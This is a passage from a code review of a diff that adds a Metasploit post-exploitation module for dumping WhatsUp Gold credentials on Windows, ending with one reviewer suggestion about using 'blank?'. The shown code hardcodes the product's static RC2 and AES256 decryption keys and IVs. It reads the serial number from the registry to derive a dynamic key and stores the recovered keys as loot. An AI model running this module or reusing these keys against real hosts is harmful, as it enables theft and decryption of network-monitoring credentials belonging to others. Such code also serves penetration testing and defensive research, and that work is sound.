modules/post/windows/gather/credentials/whatsupgold_credential_dump.rb

```diff
@@ -0,0 +1,683 @@
+    else
+      res['INTEGRATED SECURITY'] = 'false'
+    end
+    res
+  end
+
+  def parse_conn_str(db_str)
+    res = {}
+    db_connection_elements = db_str.split(';')
+    db_connection_elements.each do |element|
+      pair = element.to_s.split('=', 2)
+      k = pair[0]
+      v = pair[1]
+      res[k.upcase] = v
+    end
+    res
+  end
+
+  def init_wug_encryption
+    print_status('Init WhatsUp Gold crypto ...')
+
+    # Static RC2-40 key "salted" with 11 bytes of 0x00 - looking at you, wincrypt.h
+    @wug_rc2_key = ['112cc5a60c0000000000000000000000'].pack('H*')
+
+    # Static AES256 key and IV derived from burned-in salt value 0x1529e3cf33795488
+    @wug_aes256_key_legacy = ['5d08302a24693e074781136f12dafd9c4a41c59ce266ffa0953497cbda40ef2a'].pack('H*')
+    @wug_aes256_iv_legacy = ['7d41af8fee4d2676391460f2870caea1'].pack('H*')
+
+    # Dynamic AES256 key and IV derived from product serial number
+    salt_str = datastore['AES_SALT'] if datastore.key?('AES_SALT')
+    if salt_str
+      unless salt_str.match?(/[A-Z0-9]+/)
+        fail_with(Msf::Exploit::Failure::BadConfig, 'Invalid serial number in AES_SALT advanced option')
+      end
+      print_status("Using advanced option value '#{salt_str}' to derive AES256 dynamic encryption key and IV")
+      wug_salt_from_serial(salt_str)
+    else
+      wug_get_salt_value
+    end
+    if @wug_salt
+      vprint_status('Compose modern AES256 key and IV ...')
+      keys_modern = wug_compose_key(@wug_salt)
+      @wug_aes256_key_modern = keys_modern[:aes_key]
+      @wug_aes256_iv_modern = keys_modern[:aes_iv]
+      aes256_modern_key_hex = @wug_aes256_key_modern.unpack('H*').first.to_s.upcase
+      aes256_modern_iv_hex = @wug_aes256_iv_modern.unpack('H*').first.to_s.upcase
+      add_aes_loot('WhatsUp Gold Composed AES256', aes256_modern_key_hex, aes256_modern_iv_hex)
+    else
+      print_warning('Could not extract dynamic encryption salt; type 3 ciphertext will not be decrypted')
+    end
+  end
+
+  def wug_salt_from_serial(salt_str, store_loot: false)
+    @wug_salt = wug_sha256_salt(salt_str, 8)
+    wug_salt_hex = @wug_salt.unpack('H*').first.to_s.upcase
+    print_good('WhatsUp Gold Dynamic Encryption Salt')
+    print_good("\tHEX: #{wug_salt_hex}")
+    if store_loot
+      store_valid_credential(user: 'WhatsUp Gold Dynamic Encryption Salt', private: wug_salt_hex, private_type: :nonreplayable_hash)
+    end
+  end
+
+  def wug_get_salt_value
+    vprint_status('Get WhatsUp Gold dynamic salt from registry ...')
+    if x64?
+      reg_key = 'HKLM\\SOFTWARE\\WOW6432Node\\Ipswitch\\Network Monitor\\WhatsUp Gold'
+    else
+      reg_key = 'HKLM\\SOFTWARE\\Ipswitch\\Network Monitor\\WhatsUp Gold'
+    end
+    if !registry_key_exist?(reg_key)
+      vprint_warning('Could not locate WhatsUp Gold registry key')
+      return nil
+    end
+    salt_str = registry_getvaldata(reg_key, 'SerialNumber').to_s.delete("\000")
+    if salt_str.nil? || salt_str.empty?
```

Comment:
You should be able to replace these with `blank?`
```suggestion
    if salt_str.blank?
```